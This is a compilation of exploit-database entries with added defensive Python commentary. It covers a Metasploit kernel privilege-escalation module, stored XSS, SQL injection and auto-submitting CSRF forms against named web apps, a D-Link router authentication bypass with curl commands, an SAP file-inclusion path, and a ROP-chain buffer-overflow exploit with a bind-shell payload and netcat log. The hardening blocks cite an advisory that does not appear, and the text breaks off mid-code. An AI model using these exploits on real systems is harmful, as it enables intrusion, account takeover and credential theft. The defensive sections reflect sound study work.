gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
cores = get_cpu_info[:cores].to_i
min_required_cores = 2
unless cores >= min_required_cores
vprint_error "System has less than #{min_required_cores} CPU cores"
return CheckCode::Safe
end
vprint_good "System has #{cores} CPU cores"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
if kptr_restrict? && dmesg_restrict?
vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_restrict are enabled. KASLR bypass will fail.'
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('poc.c')
rm_f "#{executable_path}.c"
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
output = cmd_exec "#{executable_path} #{payload_path}"
output.each_line { |line| vprint_status line.chomp }
print_status 'Deleting executable...'
rm_f executable_path
Rex.sleep 5
print_status 'Deleting payload...'
rm_f payload_path
end
end
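The module's check method doubles as a hardening checklist: it gives up when the kernel is outside the listed releases, when unprivileged user namespaces are disabled, or when both kernel.kptr_restrict and kernel.dmesg_restrict are set. The block below is an added example, not part of the Metasploit module, that turns those same preconditions into findings a defender can act on. It reads the relevant /proc/sys knobs when they exist and otherwise evaluates constructed samples; the assumption that user namespaces are enabled when the Ubuntu-specific unprivileged_userns_clone knob is absent is labelled in the code.

```python
import platform
import re
from pathlib import Path

# Kernel releases the module above targets (taken from its check()).
VULNERABLE_RELEASE = re.compile(r"^4\.8\.0-(34|36|39|41|42|44|45)-generic")

# The sysctls the module's preconditions depend on, as paths under /proc/sys.
USERNS_KNOB = "kernel/unprivileged_userns_clone"   # Ubuntu/Debian-family kernels
KPTR = "kernel/kptr_restrict"
DMESG = "kernel/dmesg_restrict"


def read_sysctls(root: str = "/proc/sys") -> dict:
    """Read the knobs that exist on this host; missing files are simply absent."""
    values = {}
    for key in (USERNS_KNOB, KPTR, DMESG):
        path = Path(root) / key
        if path.is_file():
            values[key] = path.read_text().strip()
    return values


def assess(kernel_release: str, sysctl: dict) -> list:
    """Findings mirroring the module's preconditions: each one removed takes away
    something the exploit needs (vulnerable code, user namespaces, kernel pointers)."""
    findings = []
    if VULNERABLE_RELEASE.match(kernel_release):
        findings.append(f"kernel {kernel_release} is in the targeted range; update the kernel")
    # Assumption: when the Ubuntu-specific knob is absent, unprivileged user
    # namespaces are treated as enabled (the upstream default).
    if sysctl.get(USERNS_KNOB, "1") != "0":
        findings.append("unprivileged user namespaces enabled; set "
                        "kernel.unprivileged_userns_clone=0 if no workload needs them")
    if not (sysctl.get(KPTR, "0") != "0" and sysctl.get(DMESG, "0") != "0"):
        findings.append("kernel pointers readable by unprivileged users; set "
                        "kernel.kptr_restrict=1 and kernel.dmesg_restrict=1")
    return findings


# Constructed samples: a host like the module's test target, and a hardened one.
MINT_LIKE = ("4.8.0-41-generic", {USERNS_KNOB: "1", KPTR: "1", DMESG: "0"})
HARDENED = ("4.15.0-20-generic", {USERNS_KNOB: "0", KPTR: "1", DMESG: "1"})

if __name__ == "__main__":
    for release, knobs in (MINT_LIKE, HARDENED):
        print(release, assess(release, knobs) or ["no findings"])
    print("this host:", assess(platform.release(), read_sysctls()) or ["no findings"])
```

The core-count precondition is deliberately left out: it is not a setting an administrator would change, whereas the three findings above each correspond to a sysctl or an update that removes a requirement the exploit depends on.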
# Exploit Title: Joomla! extension EkRishta 2.10 - Persistent Cross-Site Scripting / SQL Injection
# Dork: N/A
# Date: 2018-05-18
# Exploit Author: Sina Kheirkhah || (Sina.For.Sec@gmail.com)
# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.10
# Category: Webapps
# CVE: N/A
#
#
#
# POC-1) Cross-site scripting (XSS):
#
#
# Description:
#
# 1) Create a profile.
# 2) You can put your payload in the profile info page.
# 3) For example, in the Address field you can use:
"></textarea><script>prompt('address')</script>
# 4) The payload will now be executed whenever someone visits your profile.
#
#
# POC-2) SQL injection:
#
# Description:
# 1) The website filters all inputs for SQL injection, BUT
# you can use the user_setting page to inject SQL code
# via the POST method:
# http://localhost/ekrishta/index.php/profile/user_setting
#
# <form method="POST" action="http://localhost/ekrishta/index.php/profile/user_setting">
# <input type="text" name="phone_no" value="SQL injection">
# <input type="hidden" name="task" value="save">
# <input type="submit" name="save" value="Save"/>
# </form>
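The advisory notes that input filtering was applied everywhere except the phone_no field of the user_setting page, which is the usual outcome of blacklisting individual inputs instead of separating code from data in the query itself. The block below is an added example, not the extension's code: an in-memory SQLite table standing in for the user profile, the same update written once by string concatenation and once with bound parameters, and a constructed phone_no value sent as user 1. The concatenated version ends up rewriting the WHERE clause and cannot even store a legitimate apostrophe; the parameterised version stores the input verbatim on the caller's own row.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the extension's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, phone_no TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "111"), (2, "bob", "222")])
    return conn


def save_phone_concat(conn, user_id: int, phone: str) -> None:
    """Vulnerable pattern: the POSTed phone_no is spliced into the statement text."""
    conn.execute(f"UPDATE users SET phone_no = '{phone}' WHERE id = {int(user_id)}")


def save_phone_param(conn, user_id: int, phone: str) -> None:
    """Hardened pattern: bound parameters, so the input can only ever be data."""
    conn.execute("UPDATE users SET phone_no = ? WHERE id = ?", (phone, int(user_id)))


def phones(conn) -> dict:
    return dict(conn.execute("SELECT id, phone_no FROM users ORDER BY id"))


def accepts_apostrophe(save) -> bool:
    """A legitimate value containing a quote: the concatenating handler errors out."""
    try:
        save(setup(), 1, "O'Brien")
        return True
    except sqlite3.OperationalError:
        return False


# Constructed input a logged-in user 1 could send as phone_no.
CRAFTED = "0' WHERE id = 2 --"


def run_demo() -> tuple:
    """Apply the same crafted input through both handlers as user 1."""
    vuln = setup()
    save_phone_concat(vuln, 1, CRAFTED)   # WHERE clause rewritten: bob's row changes
    safe = setup()
    save_phone_param(safe, 1, CRAFTED)    # stored verbatim on alice's row only
    return phones(vuln), phones(safe)


if __name__ == "__main__":
    vuln_rows, safe_rows = run_demo()
    print("concatenated :", vuln_rows)
    print("parameterised:", safe_rows)
    print("apostrophe accepted? concat:", accepts_apostrophe(save_phone_concat),
          "param:", accepts_apostrophe(save_phone_param))
```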
# Exploit Title: D-Link DSL 3782 - Authentication Bypass
# Vendor Homepage: https://eu.dlink.com
# Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
# Category: Webapps
# Exploit Author: Giulio Comi
# CVE : CVE-2018-8898
# Date: 20/05/2018
# Description
# The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not release a token ID (e.g. a session cookie) that identifies the logged-in administrator, but relies only on a server-side timeout that lasts a few minutes.
# In addition, a server-side mitigation in place prompts for login credentials every time the webroot is loaded, but leaves the application endpoints unprotected and affected by this authentication bypass.
# Therefore, after a valid login by the administrator, the web panel does not distinguish valid HTTP requests from the admin from those that come from other users.
# This way, an attacker can script an automatic routine that performs unwanted actions such as arbitrary modifications to the router and SSID passwords and configurations.
# Some of the possible actions for retrieving important information
# GET http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for SSID of 2.4Ghz
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for SSID of 5.0Ghz
# GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp ---> retrieve the password for Guest network, if present
# For POST requests that make changes to passwords, SSID names and configurations, a 'sessionKey' value is used by the web application to prevent Cross-Site Request Forgery (CSRF) attacks.
# However, this value can be retrieved through this authentication bypass with the following GET request:
# 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'
# For example, the POST request below changes the web interface administrator's password:
curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
# Some other possible actions for altering the configuration:
# POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change passwords of the SSIDs
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade firmware
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot router
# POST /cgi-bin/New_GUI/Set/config_upgrade.asp ---> upload a new configuration file ('romfile.cfg')
# Note 1: Since the router has no network segregation, a user with access to the Guest network could also perform this attack.
# Note 2: Web panels exposed to the Internet allow an anonymous attacker to leverage this vulnerability and possibly take over the router.
# Note 3: Other forks of the firmware and software versions have not been tested.
# Timeline
# 26/03 Vendor contacted
# 28/03 Vendor replied
# 05/04 Vendor requested more information to track the vulnerable firmware version, 'because the D-Link DSL 3782 have many forks'
# 05/04 I sent the detailed firmware and software version information, retrievable from:
# - the web panel graphic ('A1_WI_20170303')
# - the romfile.cfg ('SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"')
# 20/04 Requested an update, no response
# 03/05 Requested an update, no response
# 07/05 Requested an update, still no response from the security response team
# 20/05 Full disclosure
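Two of the advisories above fail in complementary ways: the Infinity Market form earlier has no anti-CSRF token at all, while the D-Link panel has a sessionKey but no session, so the key can be fetched by anyone and the state-changing endpoints cannot tell the administrator from another host. The block below is an added example serving both advisories; it is not code from either product. It issues an HMAC-signed session cookie with an expiry and a random session id, verifies the signature before trusting any claim, derives the CSRF token from the session id so it cannot be obtained without the cookie, and models a password-change handler that checks the session first and the token second. The key, the time base and the handler shape are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Per-deployment signing key; this example generates a fresh one at import time.
SECRET = secrets.token_bytes(32)
SESSION_TTL = 900  # seconds; a bounded idle window, unlike an unauthenticated timeout


def _sign(data: bytes, key: bytes = SECRET) -> str:
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def issue_session(username: str, now=None, key: bytes = SECRET) -> str:
    """Session cookie value: base64(JSON claims) + '.' + HMAC. It carries an expiry
    and a random session id, so possession of the cookie is what proves identity."""
    now = time.time() if now is None else now
    claims = {"u": username, "exp": int(now + SESSION_TTL), "sid": secrets.token_hex(16)}
    body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode()
    return body + "." + _sign(body.encode(), key)


def verify_session(cookie: str, now=None, key: bytes = SECRET):
    """Claims for a well-formed, correctly signed, unexpired cookie; otherwise None.
    The signature is checked before the body is decoded, in constant time."""
    now = time.time() if now is None else now
    body, sep, sig = cookie.partition(".")
    if not sep or not hmac.compare_digest(sig.encode(), _sign(body.encode(), key).encode()):
        return None
    claims = json.loads(base64.urlsafe_b64decode(body))
    if claims["exp"] <= now:
        return None
    return claims


def csrf_token(claims: dict, key: bytes = SECRET) -> str:
    """CSRF token derived from the session id: unguessable without the key and
    unobtainable by a request that does not carry a valid session cookie."""
    return _sign(b"csrf:" + claims["sid"].encode(), key)


def handle_set_admin(cookie: str, form: dict, now=None) -> int:
    """Model of a password-change handler. Returns an HTTP status: 401 without a
    valid session, 403 without the token bound to that session, 200 otherwise."""
    claims = verify_session(cookie, now)
    if claims is None:
        return 401
    supplied = form.get("sessionKey", "").encode()
    if not hmac.compare_digest(supplied, csrf_token(claims).encode()):
        return 403
    return 200


if __name__ == "__main__":
    t0 = 1_700_000_000
    cookie = issue_session("admin", now=t0)
    token = csrf_token(verify_session(cookie, now=t0))
    print("cookie + token :", handle_set_admin(cookie, {"Password": "new", "sessionKey": token}, now=t0))
    print("no cookie      :", handle_set_admin("", {"sessionKey": token}, now=t0))
    print("expired cookie :", handle_set_admin(cookie, {"sessionKey": token}, now=t0 + SESSION_TTL + 1))
```

With this shape, a GET to a "get_sessionKey" endpoint from a host without the cookie returns nothing usable, and a cross-site form post from the administrator's own browser still fails because the page that built the form never had the token; marking the cookie SameSite and HttpOnly when it is set adds a second, independent layer.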
#!/usr/bin/python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow #
# Date: 2018-05-19 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html #
# Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe #
# Version: 1.7.11 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit #
# Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: \x00\x0a\x0d #
# SEH Offset: 1012 #
# Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# root@kali:~/Desktop# nc -nv 10.0.1.14 4444 #
# (UNKNOWN) [10.0.1.14] 4444 (?) open #
# Microsoft Windows [Version 6.1.7601] #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
# #
# C:\Program Files (x86)\Easy MPEG to DVD Burner> #
#------------------------------------------------------------------------------------------------------------------------------------#
# My register setup when VirtualAlloc() is called (Defeat DEP) :
#--------------------------------------------
# EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
# ECX = flProtect (0x40)
# EDX = flAllocationType (0x1000)
# EBX = dwSize (0x01)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
# ESI = ptr to VirtualAlloc()
# EDI = ROP NOP (RETN)
import struct
def create_rop_chain():
rop_gadgets = [
#***START VirtualAlloc() to ESI***
0x10027e6b, # POP EAX # RETN [SkinMagic.dll] **
0x1003b1d4, # ptr to &VirtualAlloc() [IAT SkinMagic.dll]
0x100369a1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll]
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xffffffff, #
      0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bc0, # POP EDX # RETN [SkinMagic.dll]
      0xffffffff, #
      0x10035a07, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
      0x10037654, # POP EAX # RETN [SkinMagic.dll]
      0xa141dffb, #
      0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x41414141, # FILLER
      0x1003993e, # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x41414141, # FILLER
      #***END VirtualAlloc() to ESI***
      #***START 0x40 to ECX***
      0x100185fb, # XOR EAX,EAX # RETN [SkinMagic.dll]
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x10037c5b, # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
      0x41414141, # FILLER
      0x10032176, # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
      #***END 0x40 to ECX***
      #***START 0x1000 to EDX***
      0x10032993, # POP EBX # RETN [SkinMagic.dll]
      0xaaaaaaaa, #
      0x10037bc0, # POP EDX # RETN [SkinMagic.dll]
      0x55556556, #
      0x10037654, # POP EAX # RETN [SkinMagic.dll]
      0xa141dffb, #
      0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x41414141, # FILLER
      #***END 0x1000 to EDX***
      #*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
      0x1002829d, # POP EBP # RETN [SkinMagic.dll]
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x41414141, # FILLER
      0x100284f8, # {pivot 16 / 0x10} : # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
      #*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
      #***START 0x1 to EBX***
      0x10032993, # POP EBX # RETN [SkinMagic.dll]
      0xffffffff, #
      0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
      #***END 0x1 to EBX***
      #***START ROP NOP to EDI***
      0x100342f0, # POP EDI # RETN [SkinMagic.dll]
      0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
      #***END ROP NOP to EDI***
      #***START Gadgets to execute PUSHAD / Execute VirtualAlloc()***
      0x10037654, # POP EAX # RETN [SkinMagic.dll]
      0xa140acd2, # CONSTANT
      0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555", # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
      0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555, # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
      #***END Gadgets to execute PUSHAD***
      #***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode***
      0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
      0x1001cc57, # & push esp # ret [SkinMagic.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
nop_rop_chain_1 = "\xbd\xdd\x02\x10" * 18 # 0x1002ddbd : {pivot 12 / 0x0c} : # ADD ESP,0C # RETN [SkinMagic.dll]
nop_rop_chain_2 = "\x58\x21\x03\x10" * 22 # RETN (ROP NOP) [SkinMagic.dll]
seh = "\x06\x4e\x40" # 0x00404e06 : {stack pivot 1928 / 0x788} (Lands us into rop nop chain --> rop_chain) : # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
nop = "\x90" * 20
# Max space available for shellcode = 600 bytes
#------------------------------------------------------------------------------------#
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
# x86/shikata_ga_nai succeeded with size 355 (iteration=0) #
#------------------------------------------------------------------------------------#
shellcode = ""
exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh
f = open ("Exploit.txt", "w")
f.write(exploit)
f.close()
# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
# Application:SAP B2B OR B2C is CRM
# Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b)
# Vendor URL: http://SAP.com
# Bugs: SAP LFI in B2B OR B2C CRM
# Sent: 2018-05-03
# Reported: 2018-05-03
# Date of Public Advisory: 2018-02-09
# Reference: SAP Security Note 1870255656
# Author: Richard Alviarez
# 1. VULNERABLE PACKAGES
# SAP LFI in B2B OR B2C CRM v2.x to 4.x
# Other versions are probably affected too, but they were not checked.
# 2. TECHNICAL DESCRIPTION
# An attacker can take advantage of this vulnerability to obtain confidential
# information about the platform, and potentially to write into the log files
# in order to gain remote command execution and take control of the system.
# 3. Steps to exploit this vulnerability
A. Open the following page on the SAP server:
https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml
Other vulnerable parameters:
https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml
B. Replace the {name} placeholder with the application name, for example icss_b2b.
C. Replace "/WEB-INF/web.xml" with the path of another internal file or archive.
# 4. Collaborators
# - CuriositySec
# - aDoN90
# - Vis0r
# Exploit Title: Private Message PHP Script 2.0 - Persistent Cross-Site scripting
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1
# Version: 2.0
# Tested on: Windows
# Description :
Private Message PHP Script 2.0 suffers from persistent cross-site scripting.
You can put your malicious JavaScript payload into a message.
When the target opens your message, the payload will be executed before the message self-destructs.
# POC :
1) Put this payload into textarea and click submit :
</textarea><script>alert(document.cookie)</script>
2) You will get a link containing your JavaScript code. You can send this link to anyone.
3) After clicking on "show me the message", the payload will be executed.
# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
# Version: 1.0
# Tested on: Kali linux
====================================================
# Description:
Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities:
====================================================
# POC 1 : Persistent cross site scripting :
1) After creating an account, go to your profile.
2) Navigate to "Update profile" and put this payload:
"/><script>alert('xss')</script>
3) You will have an alert box in the page.
====================================================
# POC 2 : CSRF :
An attacker can change the user's authentication details directly:
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://restaurant.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="1000000000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
method="post">
<input name="name" value="exploit" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="1000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
====================================================
# POC 3 : Authentication bypass :
# An attacker can access the admin panel without any authentication:
Path : /admin
Username : ' or 0=0 #
Password : anything
====================================================
# Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting
# Dated: 2018-03-31
# Exploit Author: Ahmet GÜREL
# Software Link: https://www.manageengine.com/ad-recovery-manager/
# Version: < = 5.3 (Build 5330)
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-9163
# 1. DETAILS
# In the Add New Technician(s) section on the /admin/technicians page of the
# ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, the Login
# Name parameter is vulnerable to XSS, exploitable by remote authenticated
# users. The parameters entered are written to the database and affect all
# users.
# 2. PoC:
# From the Add New Technician(s) page, it is possible to inject malicious
# web code inside the Login Name parameter. The HTTP request looks like the following:
GET /technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22} HTTP/1.1
Host: 172.16.219.168:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.168:8090/
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A; JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D
Connection: close
# Exploit Title: Zenar Content Management System - Cross-Site Scripting
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Berk Dusunur
# Tested Website: http://demo.zenar.io
# Date: 2018-05-20
# Category: Web App
# PoC
# Request:
POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
Host: demo.zenar.io
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/plain, */*; q=0.01
Origin: http://demo.zenar.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
Accept-Encoding: gzip, deflate
Content-Length: 273
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com&current_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>
# Response:
<input type="hidden" name="formPageHash"
value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
value="1"/><fieldset
id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
class="page_"><div class="form_fields"></div><div
class="form_buttons"><input type="button" value=""
class="next"/></div>
# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
# Date: 2018-05-20
# Dork: N/A
# Exploit Author: borna nematzadeh (L0RD)
# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
# Version: 1.1.0
# Tested on: Kali linux
# POC 1 : Persistent Cross site scripting :
1) After creating an account, navigate to "Edit profile".
2) Put this payload into the "Birthday" field and save changes:
" onmouseover=alert(document.cookie) "
3) You will have an alert box in the page.
# POC 2 : Cross site request forgery :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
<input type="hidden" name="sex" value="Male" />
<input type="hidden" name="birthday" value="test" />
<input type="hidden" name="uEmail" value="ninjaassassinbn@yahoo.com" />
<input type="hidden" name="country" value="United States" />
<input type="hidden" name="about" value="test" />
</form>
<script>
document.forms[0].submit();
// profile will be updated successfully.
</script>
</body>
</html>
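The stored-XSS payloads in the entries above (the `onmouseover` attribute payload, the `</textarea><script>` breakout, the `<svg onload=...>` login name and the `'"--></style></scRipt>` attribute breakout) all get past filters that merely delete the word "script". As an added example that belongs to none of these advisories, the following Python renders each of them through such a blacklist filter and through context-aware output encoding, then parses the result the way a browser would to see whether the untrusted value changed the page structure; the template and function names are constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs: the stored-XSS payloads used in the POCs on this page.
PAYLOADS = [
    '" onmouseover=alert(document.cookie) "',              # attribute breakout, no <script>
    '</textarea><script>alert(document.cookie)</script>',  # element breakout
    '<svg onload=prompt(document.domain)>',                # tag injection, no <script>
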